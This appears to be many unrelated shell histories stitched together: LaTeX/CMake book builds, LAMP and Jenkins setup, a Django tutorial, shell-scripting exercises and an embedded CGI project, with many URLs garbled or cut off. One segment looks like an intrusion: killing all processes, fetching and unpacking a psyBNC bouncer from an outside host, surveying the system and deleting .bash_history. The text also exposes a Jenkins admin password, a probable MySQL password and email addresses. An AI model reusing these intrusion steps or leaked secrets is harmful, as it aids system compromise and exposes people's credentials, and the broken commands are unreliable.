+mkdir -p build/tex; cd build/tex; python ../../tools/Regional/regional.py ../../example-projects/fractals/src/app/fractals/fractals.cpp +ls +clear +ls -l +ls +ls +ls +clear +ls -l +ls +rm -rf tools/ build/ +ls +clear +ls -l +ls +ls +clear +ls -l +mkdir -p tools/Regional; cd tools; curl -o Regional.tar.gz -Lsoft/Regional/archive/v1.0.2.tar.gz; tar xzf Regional.tar.gz -C Regional --strip-components=1 +ls +mkdir -p build/tex; cd build/tex; python ../../tools/Regional/regional.py ../../example-projects/fractals/src/app/fractals/fractals.cpp +ls +ls +clear +ls -l +cim contents/some_links_to_the_past.tex +vim contents/some_links_to_the_past.tex +ls +clear +ls -l +ls +cmake .. +make -j2 +ls +ls +rm -rf build/ +ls +clear +ls -l +rm -rf tools/ +ls +clear +ls -l +git status +git add images/Fractal-fern.png +git status +git rm images/Fractal_fern.png +git status +git commit -m 'Renaming fractal fern image' +ls +clear +ls -l +git status +git diff example-projects/fractals/CMakeLists.txt +ls +git status +git add example-projects/fractals/CMakeLists.txt +git commit -m 'Changing reference to CMake modules to be based off of project instead of global CMake.' +git status +clear +ls -l +git status +git add contents/fractals.tex +git commit -m 'Adding test fractal chapter to import generated fractal image.' +git status +clear +ls -l +git status +git diff contents/some_links_to_the_past.tex +git add contents/some_links_to_the_past.tex +git commit -m 'Adding back in snippet example' +git status +git diff book_main.tex +ls +git add book_main.tex +git commit -m 'Adding in image example for non-generated examples. Also adding in chapter that uses generated images.' +git status +git diff CMakeLists.txt +vim CMakeLists.txt +git status +git add CMakeLists.txt +git commit -m 'Adding correct depends on all fractals targets. Adding in images location for UseLATEX. Correcting build artifacts step to correctly copy items.' +git pull +git status +git merge origin master +git push +git status +clear +ls -l +git status +clear +ls -l +git status +exit +ls +ls +git pull +git status +ls +clear +ls -l +git fetch --prune +git pull +clear +ls -l +git status +clear +ls -l +ls +ls +ls +ls +ls +ls +vim CMakeLists.txt +ls +clear +ls -l +ls +ls +vim CMakeLists.txt +ls +cler +als -l +clear +ls -l +git branch +git branch -ra +git branch -d feature_top-level-cmake +git branch +git branch -rav +git checkout feat_create-ext-lodepng +git pull +git merge master +git pull +ls +clear +git status +git push +clear +ls -l +clear +ls- l +git status +clear +ls -l +rm -rf build +ls +ls +clear +ls -l +vim shippable.yml +git checkout master +ls +clear +ls -l +git checkout -b clean-up-shippable +git status +ls +vim shippable.yml +ls +clear +ls -l +vim CMakeLists.txt +git status +git diff shippable.yml +ls +git checkout master +git status +git checkout clean-up-shippable +git add -A +git status +git commit -m 'Moving installs to YML install target.' +git pus +git push +git push --set-upstream origin clean-up-shippable +ls +git checkout master +git branhc +git branch +git status +clear +git checkout -b origin/feat_enhance-cmake-to-run-apps +git checkout master +git branch -d origin/feat_enhance-cmake-to-run-apps +ls +git status +git branch -rv +git fetch --prune +git branch -rv +git checkout -b feat_enhance-cmake-to-run-apps +git status +git push +git push --set-upstream origin feat_enhance-cmake-to-run-apps +git status +git pull +ls +mkdir build +cmake .. +make +ls +ls +cleaer +ls -l +clear +ls -l +ls +ls +ls +ls +ls +./fractals +ls +cleaer +clear +ls -l +ls +clear +ls -l +vim CMakeLists.txt +rm -rf build/ +mkdir build +rm -rf build/ +(mkdir build; cd build; cmake ..; make;) +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +clear +ls -l +vim example-projects/fractals/src/app/fractals/fractals.cpp +ls +git status +ls +ls +ls +vim book_main.tex +ls +clear +ls -l +ls +vim some_links_to_the_past.tex +ls +clear +ls -l +ls +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +clear +ls -l +git status +git diff CMakeLists.txt +ls +clear +ls -l +git status +git diff book_main.tex +ls +clear +ls -l +git diff +git status +clear +ls -l +git status +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +ls build/fractals-build/build-files/src/app/ +ls +ls +ls +l +ls +ls +clear +ls -l +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +lcd build/ +ls build/ +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +ls +ls +ls +ls +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +rm rf shippable +ls +ls +rm -rf shippable +ls +ls +ls +ls +clear +ls -l +vim shippable.yml +git status +git add example-projects/* +git status +git commit -m 'Removing printing of fractal image since it serves no purpose at all.' +git status +git add book_main.tex +git commit -m 'Adding some whitespace and some comment markers for sections.' +git status +git diff contents/some_links_to_the_past.tex +ls +clear +ls -l +git status +git add contents/some_links_to_the_past.tex +git commit -m 'Updating link to new snippet section since I removed the image printing. Now the snippet should just be the creation of a fractl.' +git status +git diff CMakeLists.txt +ls +clear +ls -l +git status +git add CMakeLists.txt +git status +git commit +git status +git diff shippable.yml +git add shippable.yml +clear +ls- l +git commit -m 'Changing shippable to pull all contenst from build-artifacts now. This decouples the need for shippable in the future is need be. Just by running the build you will get a local artifacts directory. We can then bolt on any third-party item to do with how they choose (like we do with shippable).' +git status +clear +ls- l +clear +sl -l +git status +git push +clear +ls -l +ls +clear +ls -l +git status +ls +clear +ls -l +ls +clear +ls -l +cp gnu_autotools.tex fractals.tex +ls +vim fractals.tex +ls +ls +vim book_main.tex +mkdir images +ls +clear +ls -l +ls +vim CMakeLists.txt +ls +rm -rf ~ +ls +git status +rm \~ +ls +clear +ls -l +ls +ls +ls +ls +clear +ls -l +clear +ls -l +git status +vim book_main.tex +lsls +ls +clear +ls -l +ls +clear +ls -l +git status +vim contents/fractals.tex +ls +clear +ls -l +ls +ls +clear +ls -l +vim CMakeLists.txt +ls +clear +ls -l +git status +clear +ls l +clear +ls -l +vim shippable.yml +ls +git pull +git status +git pull +clear +ls -l +git merge master +git status +git pull +clear +ls -l +vim book_main.tex +ls +clear +ls -l +git status +clear +ls -l +vim CMakeLists.txt +ls +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +ls +clear +ls -l +ls +clear +ls -l +vim CMakeLists.txt +ls +git clone +ls +ls +ls .* ~/ +cp .* ~/ +ls +source .bashrc +ls +clear +ls -l +ls -la +rm -rf Code/ +ls +clear +ls -l +ls +ls +ls +clear +ls -l +vim CMakeLists.txt +ls +clear +ls -l +git status +clear +ls -l +git status +git diff CMakeLists.txt +ls +clear +ls -l +rm -rf build/ +ls +clear +ls -l +sl +ls +clear +ls -l +git status +ls +clear +ls -l +ls +clear +ls -l +ls +rm fractal.png +ls +clear +ls -l +ls +clear +ls -l +vim book_main.tex +vim contents/fractals.tex +ls +clear +ls -l +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +git status +git diff book_main.tex +vim book_main.tex +ls +git diff book_main.tex +ls +clear +ls -l +vim book_main.tex +git status +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +git status +ls +rm -rf fractal.png +ls +ls +clear +ls -l +git add images/ +ls +git status +git commit -m 'Adding creative commons image for front of book image testing.' +clear +ls -l +git status +git contents/fractals.tex +git diff contents/fractals.tex +git add contents/fractals.tex +git status +git reset HEAD contents/fractals.tex +ls +git status +git diff book_main.tex +ls +vim book_main.tex +ls +git status +git add book_main.tex +git commit -m 'Adding new title pic and image for front cover.' +git status +git diff CMakeLists.txt +git add CMakeLists.txt +git commit -m 'Fixing issues with location of files to copy and create.' +git status +git push +git pull +git merge master +clear +ls -l +git status +git pull origin master +git status +ls +clear +git push +git status +clear +ls -l +ls +vim shippable.yml +git status +clear +ls -l +git push +clear +ls -l +ls +clear +ls -l +vim shippable.yml +mkdir -p tools/Regional; cd tools; curl -o Regional.tar.gz -Lstrip-components=1 +ls +curl -o Regional.tar.gz -L +sudo apt-get install curl +ls +ls +rm -rf tools/ +mkdir -p tools/Regional; cd tools; curl -o Regional.tar.gz -Lstrip-components=1; +ls +ls -la +curl -o Regional.tar.gz -L +ls -la +rm -rf tools/ +ls +vim shippable.yml +ls +clear +ls -l +vim contents/some_links_to_the_past.tex +ls +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +vim book_main.tex +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +vim book_main.tex +ls +clear +ls -l +rm -rf build/ +ls +clear +ls -l +ls +vim CMakeLists.txt +ls +clear +ls -l +ls +ls +clear +ls -l +clear +ls -l +vim shippable.yml +ls +clear +ls -l +vim book_main.tex +ls +clear +ls- l +vim book_main.tex +vim CMakeLists.txt +git status +git diff shippable.yml +git add shippable.yml +git commit -m 'Change location of Regional repo' +git status +git diff CMakeLists.txt +git add CMakeLists.txt +git commit -m 'Adding images dif to UseLATEX' +git statys +git status +git diff book_main.tex +git add book_main.tex +git commit -m 'Adding back in titlepic' +git status +git diff contents/some_links_to_the_past.tex +ls +git add contents/some_links_to_the_past.tex +git commit -m 'Removing snippet example for now' +git status +git pull +git push +git status +git pull +clear +ls -l +ls +clear +ls -l +git status +vim shippable.yml +git add CMakeLists.txt +git commit -m "Adding -p to shippable since RObert decided to go ahead and make the build directory. I'm not so sure he tested that stuff enough..." +git add shippable.yml +git commit -m "Adding -p to shippable since RObert decided to go ahead and make the build directory. I'm not so sure he tested that stuff enough..." +(rm -rf build; mkdir build; cd build; cmake ..; make;) +pdftops +sudo apt-get install pdftops +sudo apt-get install poppler-utils +(rm -rf build; mkdir build; cd build; cmake ..; make;) +sudo apt-get install imagemagick +(rm -rf build; mkdir build; cd build; cmake ..; make;) +git status +git diff shippable.yml +git add shippable.yml +git commit -m 'Adding a few more depends since I am now including images into the latex source.' +git status +git push +git pull +git merge origin master +git pull +git status +git push +clear +ls -l +git status +vim shippable.yml +ls +git add shippable.yml +git commit -m 'Adding in saying yes to installs' +git push +git pull +clear +ls -l +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +ls +s +ls +open fractal.png +git status +git diff CMakeLists.txt +it add CMakeLists.txt +git add CMakeLists.txt +git commit -m 'Correcting wrong path to built book PDF' +git push +git pull +git status +clear +ls -l +git status +clear +ls- l +clear +ls -l +vim book_main.tex +vim CMakeLists.txt +ls +ls +ls +ls +ls +ls +rm images/fractal.png +ls +(rm -rf build; mkdir build; cd build; cmake ..; make;) +vim CMakeLists.txt +vim book_main.tex +(rm -rf build; mkdir build; cd build; cmake ..; make;) +vim book_main.tex +(rm -rf build; mkdir build; cd build; cmake ..; make;) +vim book_main.tex +make +d .. +ls +ls +clear +ls -l +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +clear +ls -l +ls +ls +vim CMakeLists.txt +ls +(rm -rf build; mkdir build; cd build; cmake ..; make;) +vim CMakeLists.txt +55 +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +vim CMakeLists.txt +(rm -rf build; mkdir build; cd build; cmake ..; make;) +vim book_main.tex +(rm -rf build; mkdir build; cd build; cmake ..; make;) +vim book_main.tex +(rm -rf build; mkdir build; cd build; cmake ..; make;) +vim book_main.tex +imv book_main.tex +vim book_main.tex +vim contents/fractals.tex +vim book_main.tex +vim contents/fractals.tex +vim book_main.tex +vim contents/fractals.tex +vim book_main.tex +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +ls +rm fractal.png +ls +ls +clear +ls -l +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +clear +ls -l +ls +ls +ls +ls +vim CMakeLists.txt +ls build/ +ls +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +ls +rm fractal.png +ls +ls +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +ls images/ +ls +clear +ls -l +ls +ls +ls +ls +clear +ls -l +ls +clear +ls -l +ls +clear +ls -l +git status +vim book_main.tex +(rm -rf build; mkdir build; cd build; cmake ..; make;) +ls +ls +ls +ls +ls +ls +ls +clear +ls -l +(rm -rf build; mkdir build; cd build; cmake ..; make;) +vim book_main.tex +ls +mv Fractal_fern.png Fractal-fern.png +ls +ls +clear +ls -l +(rm -rf build; mkdir build; cd build; cmake ..; make;) +vim book_main.tex +(rm -rf build; mkdir build; cd build; cmake ..; make;) +la +ls +clear +ls -l +clear +ls -l +git status +ls +clear +ls -l +vim book_main.tex +make +vim ../book_main.tex +make +vim ../book_main.tex +make +vim ../book_main.tex +make +vim ../book_main.tex +(rm -rf build; mkdir build; cd build; cmake ..; make;) +clear +ls -l +ls +vim shippable.yml +exit +git status +ls +clear +ls -l +ls +ls +ls +clear +ls -l +rm -rf Music/ Pictures/ Videos/ Templates/ +ls +clear +ls -l +rm -r Documents/ +ls +clear +ls -l +ls +ls +clear +ls -l +rm Build1* +ls +clear +ls -l +ls +clear +ls -l +ls +clear +ls -l +git checkout master +ls +clear +ls -l +git pull +ls +ls -la +ls +ls +clear +ls -l +ssh-keygen +ls +ls -la +vim .ssh/id_rsa.pub +gedit .ssh/id_rsa.pub +sudo apt-get remove chromium +sudo apt-get install chromium +sudo apt-cache search chromium +sudo apt-get remove chromium-browser +sudo apt-get install chromium-browser +ls +ls -la +ls +ls +rm debian-xterm.desktop +ls +ls +ls +clear +ls -l +git pull +git status +clear +ls -l +git pull +git status +clear +git push +ls +ls +clear +ls -l +ls + ls +ls -la +ls +clear +ls -l +vim known_hosts +ls +clear +ls -l +clear +ls -l +ls +ls +clear +ls -l +-l +ls +dir +dir -C +dir +dir +dir +sudo +su +SU +su +shmode 111 Unidad_RAID10 +shmode Unidad_RAID10 111 +shmode +rwx Unidad_RAID10 +dir +shmode +r Unidad_RAID10 +sudo shmode +r Unidad_RAID10 +sudo shmode +rwx Unidad_RAID10 +sudo shmode rwx Unidad_RAID10 +sudo shmode 777 Unidad_RAID10 +ls -la +sudo chmod 777 Unidad_RAID10 +ls -la +sudo apt install python python-dev +sudo apt-get install python python-dev +sudo apt update +sudo apt-get update +sudo apt-get install python python-dev +sudo apt-get update +sudo apt-get install python python-dev +sudo apt-get install python setuptools +sudo apt-get install python-setuptools +sudo add-apt-repository ppa:webupd8team/atom +sudo add-apt-repository ppa:webupdSteam/atom +sudo add-apt-repository ppa:webupd8team/atom +sudo apt-get update +sudo apt-get install atom +clear +python hola.py +python +python segundo.py +Segundo.py +python Segundo.py +funcion.py +href.py +enlaces.py +funcion.py +pyton enlaces.py +python enlaces.oy +python enlaces.py +sudo apt-get install mysql-server mysql-client +sudo apt-get install update +sudo apt-get install +sudo apt-get install mysql-server mysql-client +apt-get update +sudo apt-get install mysql-server mysql-client +ping www.google.com +sudo apt update +sudo apt-get install mysql-server mysql-client +sudo mysql_secure_installtion +sudo mysql_secure_installation +mysql -u root -p +sudo apt-get install python-mysqldb +BaseDatos1.py +python BaseDatos1.py +sudo install apache2 +sudo apt install apache2 +sudo apt-get update +sudo apt install apache2 +mkdir python-web +mkdir app +mkdir html +mkdir logs +sudo nano /etc/apache2/sites-available/python-web.conf +sudo a2en +sudo a2ensite python-web +sudo a2en +sudo a2ensite python-web +sudo a2en +catch /etc/apache2/sites-available/python-web.conf +sudo a2ensite python-web +sudo a2en +sudo nano /etc/apache2/sites-available/python-web.conf +sudo a2en +sudo a2ensite python-web +sudo nano /etc/apache2/sites-available/python-web.conf +sudo service apache2 reload +sudo nano /etc/apache2/sites-available/python-web.conf +sudo service apache2 reload +sudo apt-get install libapache2-mod-wsgi +sudo apt-get update +sudo apt-get install libapache2-mod-wsgi +sudo service apache2 reload +sudo nano /etc/apache2/sites-available/python-web.conf +sudo service apache2 reload +sudo nano /etc/apache2/sites-available/python-web.conf +sudo service apache2 reload +sudo a2ensite python-web +sudo service apache2 reload +sudo nano /etc/hosts +sudo nano /etc/apache2/sites-available/python-web.conf +sudo service apache2 restart +mkdir djangogirls +python +python3 -venv miav +python3 -m venv miav +sudo apt-get update +python -m venv miav +sudo apt-get install python -m venv miav +sudo apt-get python3-venv +sudo apt-get install python3-venv +clear +sudo apt-get install python3-venv +sudo apt-get update +python3 -m venv myvenv +sudo apt-get update +sudo apt-get install git +git init +git config user.name prokingmarvin +git config user.email prokingmarvin@hotmail.com +git status +nano .gitignore +git status +nano .gitignore +git status +git add --all . +git commit -m "Mi app Django Girls, primer commit" +git remote add originst-blog.git +git push -u origin master +ls -l +df -lh +du +apache2ctl -M +ls +exit +sudo su +sudo su +su git +su user +su git +sudo su +sudo apt-get install git +sudo apt-get update +git +sudo apt-get update +sudo apt-get install openjdk-8-jdk +java -version +wget -q -O -s.io/debian-stable/jenkins.io.key +wget -q -O -s.io/debian-stable/jenkins.io.key | sudo apt-key add - +sudo apt-get update +sudo apt-get install jenkins +sudo apt install jenkins +sudo apt update +sudo apt install jenkins +echo 'debs.io/debian-stable binary/' | sudo tee -a /etc/apt/sources.list.d/jenkins.list +sudo apt update +sudo apt install jenkins +sudo systemctl start jenkins +sudo systemctl status jenkins +sudo systemctl status jenkins +sudo cat /var/lib/jenkins/secrets/initialAdminPassword +fae97a2c643a428e9562b6f787a075c0 +l +ls +pwd +ls +pwd +ls +pwd +ls +ll +exit +ll +ll +su +exit +exit +sudo apt-get update +sudo apt-get install apache2 +sudo service apache2 start +sudo apt-get install sysv-rc-conf +sudo sysv-rc-conf apache2 on +sudo sysv-rc-conf --list apache2 +sudo a2enmod setenvif headers deflate filter expires rewrite include +sudo /etc/init.d/apache2 restart +sudo groupadd www +sudo usermod -a -G www ubuntu +exit +groups +sudo chown -R root:www /var/www +sudo chmod 2775 /var/www +find /var/www -type d -exec sudo chmod 2775 {} + +find /var/www -type f -exec sudo chmod 0664 {} + +sudo apt-get install mysql-server mysql-client +sudo service mysql start +sudo mysql_secure_installation +sudo sysv-rc-conf mysqld on +sudo apt-get install php5 libapache2-mod-php5 php5-mysql +sudo service apache2 restart +echo "" > /var/www/html/phpinfo.php +sudo echo "" > /var/www/html/phpinfo.php +sudo apt-get install phpmyadmin +sudo nano /etc/apache2/apache2.conf +Include /etc/phpmyadmin/apache.conf +sudo nano /etc/apache2/apache2.conf +sudo service apache2 restart +sudo php5enmod mcrypt +sudo service apache2 restart +exit +$ apt-get install git +apt-get install git +sudo apt-get install git +git clone +git pull +git config --global +git config --global http.proxy +git clone +git config --global http.proxy +git clone +git config --global http.proxy +git clone +git init +git remote add origin +git remote add origin +git add index.html +git add index.* +git add *.html +git add index.html +git clone +sudo proxy_no +git config --global http.proxy +git config --global --unset http.proxy +git clone +git status +git add * +git status +git commit -m "First commit" +git push origin master +git pull origin master +git push origin master +git checkout -b new_Readme +nano README.md +git add nano README.md +git add README.md +git commit -m "Changed README.md" +git checkout master +cat README +nano README.md +git merge new_Readme +nano README.md +git push origin master +nano README.md +git log +git tag 0.0.1 478987617b +git tag 0.0.1 941e1696f72210098a0c655f3b031d946088850d +git tag +git add -A +git push origin master +git add -A +git add index.html +git add -A +git push origin master +git add *.html +git status +git add *.html +vim index.html +git add *.html +git push origin master +git status +git commit "intente subir el html" +git commit -m "intente subir el html" +git status +git config --global user.name "hotaku6kun" +git status +git push origin master +vim index.html +cat README +git pull origin master +exit +git push origin master +sudo apt-get install phpmyadmin +sudo nano /etc/apache2/apache2.conf +sudo service mysql start +sudo service mysql stop +sudo service mysql start +kill mysql +UPDATE mysql.user SET Password=PASSWORD('[password]') WHERE User='[username]'; +cat /usr/local/directadmin/conf/mysql.conf +sudo service mysql start +sudo service mysql stop +sudo service mysql start +kill 1658 +cat /usr/local/directadmin/conf/mysql.conf +sudo kill 1658 +sudo service mysql start +sudo kill 1464 +sudo service mysql start +top +sudo kill 1832 +sudo service mysql start +top +kill 2038 +sudo kill 2038 +sudo kill 2235 +git push origin master +git pull origin master +cat README +vim README.md +git push origin master +sudo apt-get install phpmyadmin +sudo php5enmod mcrypt +sudo service apache2 restart +sudo sysv-rc-conf mysqld on +sudo /etc/init.d/mysql restart +$cfg['Servers'][$i]['host'] = ''; +vim config.inc.php +vim index.html +rm index.html +vim index.html +git push origin master +git add -A +git push origin master +git commit -m "intento Proyecto parcial" +git push origin master +vim index.html +git commit -m "Proyecto parcial terminado" +git push origin master +vim index.html +git commit -m "Proyecto parcial terminado funcional" +git add -A +git commit -m "Proyecto parcial terminado funcional" +git push origin master +vim index.html +vim README.md +git push origin master +git commit -m "Proyecto parcial Con link" +git add -A +git commit -m "Proyecto parcial Con link funcional" +git push origin master +git add -A +git commit -m "Proyecto parcial Completo Final" +git push origin master +sudo launchctl stop org.macports.mysql5 +sudo php5enmod mcrypt +vim config.inc +rm config.inc +sudo service mysql stop +sudo /opt/lampp/lampp start +apt-get install -y python-central +sudo apt-get install -y python-central +apt-get remove -y mysql-client-5.1 +sudo apt-get remove -y mysql-client-5.1 +sudo apt-get remove mysql-server mysql-client +sudo apt-get remove php5 libapache2-mod-php5 php5-mysql +sudo apt-get remove phpmyadmin +sudo apt-get install mysql-server mysql-client +sudo service mysql start +sudo mysql_secure_installation +sudo sysv-rc-conf mysqld on +sudo apt-get install php5 libapache2-mod-php5 php5-mysql +sudo service apache2 restart +echo "" > /var/www/html/phpinfo.php +sudo apt-get install phpmyadmin +sudo nano /etc/apache2/apache2.conf +sudo service apache2 restart +sudo apt-get install phpmyadmin +sudo apt-get remove phpmyadmin +sudo apt-get install phpmyadmin +sudo service apache2 restart +sudo vim /etc/apache2/apache2.conf +sudo service apache2 restart +# Include web access to phpmyadmin +mySQL +$ cat ~/.my.cnf +cat ~/.my.cnf +vim .my.cnf +chmod 600 .my.cnf +stat .my.cnf +vim .my.cnf +mysql +mysql jheithof +mysql jheithof@localhost +mysql ubuntu@ip +mysql ubuntu@ip-172-31-45-158 +mysql nemesissudou +mysql 1bEoGCs0fQjeR +vim .my.cnf +mysql ubuntu +vim .my.cnf +mysql ubuntu +rm .my.cnf +mysql ubuntu +mysql +vim .my.cnf +mysql ubuntu +vim .my.cnf +mysql ubuntu +vim .my.cnf +mysql ubuntu +vim .my.cnf +mysql ubuntu +vim .my.cnf +mysql ubuntu +vim .my.cnf +mysql ubuntu +vim .my.cnf +mysql ubuntu +mysql -u root +mysql -u root -p +mysql -u hotaku6kun -p +sudo apt-get install mysql-server mysql-client +sudo apt-get remove mysql-server mysql-client +sudo apt-get install mysql-server mysql-client +sudo service mysql start +sudo mysql_secure_installation +exit +sudo apt-get install php5-curl +composer --version +sudo apt-get install composer +curl -sSser.org/installer | php +sudo service apache2 restart +curl google.com +curl +composer +curl -sSser.org/installer | php +composer +mv ~/composer.phar /usr/local/bin/ +sudo mv ~/composer.phar /usr/local/bin/ +composer +compose +composer --version +sudo apt-get update +sudo service apache2 restart +composer +sudo service mysql restart +vi /var/log/apache2/error.log +ls +mkdir nando +ls +pwd +halt +mcedit +nano +vi +ls +ls +vi +ls +vi \'Fernando\ Westphal\' +ls +vi +ls +cat 123 +exit +ls +exit +ls +rm 'Fernando Westphal' +vi ? +vi /'Fernando Westphal' +vi /'Fernando / Westphal' +vi \'Fernando\ Westphal\' +rm \'Fernando\ Westphal\' +ls +rm 123 +ls +rm ? +ls +exit +ls +exit +ls +exit +vi +ls +exit +ls +exit +ls +vi +ls +echo PATH +echo $PATH +ls +mkdir bin +ls +vi +ls +chmod +x primeiro +ls +./primeiro +ls -l +primeiro +vi primeiro +primeiro +./primeiro +clear +ls -l +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +exit +ls +ls +chmod +x primeiro +primeiro +VARIAVEL= "estou sem ideias" +VARIAVEL="estou sem ideias" +echo $ VARIAVEL +estou sem ideias +echo $VARIAVEL$VARIAVEL +HOJE=$(date) +echo "Hoje $HOJE" +HOJE= `date` +HOJE=`date` +echo "hoje + +exit + +end + +unset hoje +ls +cat -n primeiro +ls +primeiro +cat -n primeiro +cat -n primeiro +cat -n primeiro +cat -n primeiro +ls +vi +exit +ls +ls +n1=6 +n2=7 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +test "$n1" -lt $n2 || echo "menor" +n1=6 +n2=7 +test "$n1" -lt $n2 || echo "menor" +n1=8 +test "$n1" -lt $n2 || echo "menor" +n1=6 +test "$n1" -lt $n2 || echo "menor" +echo "informe usuario:" ;read user; +test "$n1" -lt $n2 || echo "menor" +echo "informe usuario:" ;read user; +test "$n1" -lt $n2 || echo "menor" +echo "informe usuario:" ;read user; +vi +exit +ls +ls +vi +n1= "20 anos" +n1="20 anos" +n2="15 anos" +test "$n1" -lt $n2 || echo "20 anos" +vi +ls +./exercicio2 +chmod +x +chmod +x exercicio2 +./exercicio2 +vi exercicio2 +./exercicio2 +vi exercicio2 +exit +ls +ls +rm trabalho +ls +vi +ls +vi Trabalho-script +ls +vi Trabalho-script +end +exit +ls +vi Trobalho-script +vi Trabalho-script +ls +ls +vi Trabalho-script +chmoa +chmod +x Trabalho-script +./Trabalho-script +vi Trabalho-script +./Trabalho-script +vi Trabalho-script +./Trabalho-script +./Trabalho-script.sh +./Trabalho-script +445 +vi Trabalho-script +./Trabalho-script +vi Trabalho-script +./Trabalho-script +vi Trabalho-script + +vi Trabalho-script +./Trabalho-script +vi Trabalho-script +./Trabalho-script +vi Trabalho-script +./Trabalho-script +vi Trabalho-script +./Trabalho-script +vi Trabalho-script +./Trabalho-script +vi Trabalho-script +./Trabalho-script +vi Trabalho-script +./Trabalho-script +vi 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+./calculadora +exit +ls +vi Trabalho-script +exit +g++ -o main *.cpp +main +g++ -o main *.cpp +g++ -o main *.cpp +g++ -o main *.cpp +g++ -o main *.cpp +g++ -o main *.cpp +g++ -o main *.cpp +g++ -o main *.cpp +g++ -o main *.cpp +g++ -o main *.cpp +clear +g++ -o main *.cpp +g++ -o main *.cpp +main +g++ -o main *.cpp +main +g++ -o main *.cpp +g++ -o main *.cpp +g++ -o main *.cpp +main +main +main +igor +ps x +kill -9 -1 +kill -9 -9 +kill -9 +wall +kill +ps x +w +wget Micu.xhost.ro/psybnc-linux.tgz +tar zxvf psybnc-linux.tgz +w +ping +ping +ping +cim toto +vim toto +sh toto +sh toto +chmod +x toto +./toto +ping +ping +ssh +vim toto.sh +chmod +x toto.sh +./toto.sh +ps aux +ls /proc/ +ls / +ls -lh / +ls -lh /var/ +ls -lh /var/log/ +ls -lh /var/cache/ +ls -lh /var/cache/apache2 +ls -lh /home/ +ps auxZ +mount +sudo su - +ls +ls -als +rm .bash_history +history +ls -lart +ps -axuww +find . -mtime -1 +sudo find . -mtime -1 +sudo su - +w +uname -a +cat /proc/cpuinfo +w +passwd +w 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+git remote -v +pwd +git branch -r +git push origin master +git push +git push -u origin master +git pull +pwd +mkdir code +pwd +pwd +git add . +..cd +ls +git add . +git commit -m "add additonal content to README" +git push -u origin master +git push +git push +git add . +git commit -m "add additional content to README" +git push +git pull +git pull +git status +learn open setting-up-a-new-site-v-000 +mkdir exceptional-realty +ls +touch README.md +touch .gitignore +atom . +pwd +atom ./.dotfile +atom exceptional-realty +pwd +ls +atom README.md +learn open README.md +subl . +ls +pwd +ls +ls +learn open +ls +learn open +git clone git@github.com:learn-co-students/setting-up-a-new-site-v-000.git +ls +ls -a +git init +ls +vi README +ls +ls +ls +mkdir remote_exec_CGI +cp smart_car_CGI/Makefile remote_exec_CGI/ +ls +vi Makefile +ls +cp ../smart_car_CGI/error.c . +cp ../smart_car_CGI/smart_car_move.c . +l +mv smart_car_move.c remote_lib.c +ls +vi remote_lib.c +ls +ls +vi remote.html +ls +./wlan_ap.sh +ls +vi remote.html +ls +ls +ls +vi Makefile +vi post_handler.c +ls +vi remote_lib.c +ls +make +vi remote_lib.c +ls +make +ls +make install +ls +ls +vi remote.html +ls +ls +ls +vi post_handler.c +ls +vi post_handler.c +ls +vi post_handler.c +make +make install +vi post_handler.c +ls +make +vi Makefile +make +make install +vi post_handler.c +make install +vi post_handler.c +make install +vi post_handler.c +ls +ls +mkdir user_home +cp smart_car_CGI/Makefile user_home/ + user_home/ +ls +ls +vi post_handler.c +ls +ls +l +ls +make install +ls +ls +vi user_code.c +ls +ls +ls +vi smart_car_move.c +ls +ls +ls +vi user_code.c +ls +gcc user_code.c +AXI_GPIO_BASEADDR +ls +vi xil_io.h +ls +vi user_code.c +vi addr_define.h +ls +gcc user_code.c +ls +./a.out +ls +vi user_code.c +ls +gcc user_code.c +ls +./a.out +cp user_code.c user_example.c +ls +ls +ls +vi post_handler.c +ls +ls +ls +rm a.out +reboot +ls +./wlan_ap.sh +ls +ls +ls +vi user_code.c +ls +ls +ls +make install +make +vi post_handler.c +make +vi post_handler.c +ls +make +vi post_handler.c +make install +vi post_handler.c +make install +l +ls +ls +ls +vi post_handler.c +ls +make install +ls +ls +ls +vi smart_car_move.c +ls +vi error.c +ls +ls +ls +vi post_handler.c +ls +ls +gcc ./user_home/user_code.c +ls +ls +cp user_example.c user_code.c +ls +ls +vi post_handler.c +ls +make install +ls +gcc ./user_home/user_code.c +ls +rm a.out +ls +ls +vi post_handler.c +ls +ls +ls +make install +ls +ls +ls +vi make_uset_code.sh +ls +chmod 777 make_uset_code.sh +ls +./make_uset_code.sh +mv make_uset_code.sh make_user_code.sh +lsl +ls +./make_user_code.sh +ls +gcc user_code.c +cat user_code.c +ls +cp user_example.c user_code.c +ls +ls +./make_user_code.sh +ls +rm a.out +ls +ls +ls +vi post_handler.c +make install +ls +ls +ls +ls +vi post_handler.c +make install +ls +chmod 777 a.out +./a.out +ls +rm a.out +ls +vi post_handler.c +make install +ls +ls +ll a. +ll a.out +./a.out +ls +ls +ls +rm a.out +ls +ls +ls +vi post_handler.c +make install +ls +ls +l +ls +ls +ls +vi post_handler.c +ls +make install +ls +reboot +ls +halt +ls +vi 